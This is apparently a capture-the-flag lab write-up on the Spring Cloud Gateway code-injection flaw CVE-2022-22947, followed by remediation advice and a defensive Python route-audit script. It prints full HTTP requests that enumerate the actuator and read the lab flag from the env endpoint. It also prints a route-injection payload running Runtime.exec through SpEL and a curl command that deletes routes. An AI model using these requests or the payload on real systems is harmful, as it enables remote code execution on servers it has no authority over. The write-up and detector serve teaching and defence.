Target description:
The Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947) lies in the Actuator endpoint of Spring Cloud Gateway applications: when that endpoint is enabled, exposed and left unsecured, it is susceptible to code injection. An attacker can craft a malicious request through this vulnerability that allows arbitrary remote execution on the remote host.
Analysis:
Spring Cloud Gateway is the routing component of the Spring Java framework; an older version deployed without any security policy configured is affected by this issue.
Affected versions:
3.1.x series: Spring Cloud Gateway < 3.1.1
3.0.x series: Spring Cloud Gateway < 3.0.7
Other older, unsupported Spring Cloud Gateway versions
Change the request to GET /actuator to confirm that the actuator endpoint is enabled
GET /actuator/ HTTP/1.1
Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
HTTP/1.1 200 OK
Date: Tue, 05 Dec 2023 03:02:31 GMT
Content-Type: application/vnd.spring-boot.actuator.v3+json
Content-Length: 2675
Connection: close
{"_links":{"self":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator","templated":false},"beans":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/beans","templated":false},"caches-cache":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/caches/{cache}","templated":true},"caches":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/caches","templated":false},"health-path":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/health/{*path}","templated":true},"health":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/health","templated":false},"info":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/info","templated":false},"conditions":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/conditions","templated":false},"configprops-prefix":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/configprops/{prefix}","templated":true},"configprops":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/configprops","templated":false},"env-toMatch":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/env/{toMatch}","templated":true},"env":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/env","templated":false},"loggers-name":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/loggers/{name}","templated":true},"loggers":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/loggers","templated":false},"heapdump":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/heapdump","templated":false},"threaddump":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/threaddump","templated":false},"metrics":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/metrics","templated":false},"metrics-requiredMetricName":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/metrics/{requiredMetricName}","templated":true},"scheduledtasks":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/scheduledtasks","templated":false},"mappings":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/mappings","templated":false},"refresh":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/refresh","templated":false},"features":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/features","templated":false},"gateway":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/gateway","templated":false}}}
The response lists the available endpoint addresses
Open this one in the browser address bar
http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080/actuator/env
In the returned JSON, at JSON.propertySources[3].properties.ICQ_FLAG.value
the flag can be found: "flag{998a1337-d197-4ed9-9c94-c9272fb1eb38}"
—————————————————— End ——————————————
Add a route: POST /actuator/gateway/routes/test1234 HTTP/1.1
POST /actuator/gateway/routes/test1234 HTTP/1.1
Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 337

{
  "id": "test1234",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
Refresh the routes: POST /actuator/gateway/refresh HTTP/1.1
POST /actuator/gateway/refresh HTTP/1.1
View the route: GET /actuator/gateway/routes/test1234 HTTP/1.1
GET /actuator/gateway/routes/test1234 HTTP/1.1
Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
As for taking the exploitation further, my skills are too limited; I was only able to delete arbitrary routes.
curl -X DELETE http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080/actuator/gateway/routes/test
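A defender-side audit of gateway route definitions, added here as an example and not part of the original writeup: it parses a constructed list of RouteDefinition-shaped JSON objects (the same shape the POST above sends; that GET /actuator/gateway/routes returns this exact shape is an assumption) and flags every filter or predicate argument that carries a SpEL `#{...}` expression, rating one that uses a `T(...)` type reference as critical. The sample routes and their names are constructed.

```python
import json
import re

# Constructed sample modelled on the route definition POSTed above; "orders" is a
# benign route added for contrast. Both routes and all names are made up.
SAMPLE_ROUTES = json.dumps([
    {
        "id": "test1234",
        "predicates": [],
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray("
                         "T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
            }
        }],
        "uri": "http://example.com",
    },
    {
        "id": "orders",
        "predicates": [{"name": "Path", "args": {"_genkey_0": "/orders/**"}}],
        "filters": [{"name": "AddResponseHeader", "args": {"name": "X-Backend", "value": "orders"}}],
        "uri": "http://orders.internal",
    },
])

# A SpEL expression template: anything of the form #{ ... }.
SPEL_RE = re.compile(r"#\{.*?\}", re.S)
# SpEL type-reference syntax T(fully.qualified.Class): the construct that lets an
# expression reach Runtime, ProcessBuilder and similar classes.
TYPE_REF_RE = re.compile(r"\bT\(")


def audit_routes(routes_json):
    """Return (route id, filter/predicate name, arg name, severity) for each arg holding SpEL.

    Severity is "critical" when the expression contains a T(...) type reference,
    otherwise "warning". Legitimate route arguments are plain strings, so any hit
    in a route you did not define deserves incident handling, not just cleanup.
    """
    findings = []
    for route in json.loads(routes_json):
        for kind in ("filters", "predicates"):
            for item in route.get(kind, []):
                for arg, value in item.get("args", {}).items():
                    if not isinstance(value, str) or not SPEL_RE.search(value):
                        continue
                    severity = "critical" if TYPE_REF_RE.search(value) else "warning"
                    findings.append((route.get("id"), item.get("name"), arg, severity))
    return findings
```

Feed it the JSON from the routes endpoint of your own gateway after upgrading or disabling the endpoint, so any route planted before the fix is found and removed.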
Remediation:
If the Gateway actuator endpoint is not needed, disable it with management.endpoint.gateway.enabled: false.
Upgrade the version:
- Spring Cloud Gateway >= 3.1.1
- Spring Cloud Gateway >= 3.0.7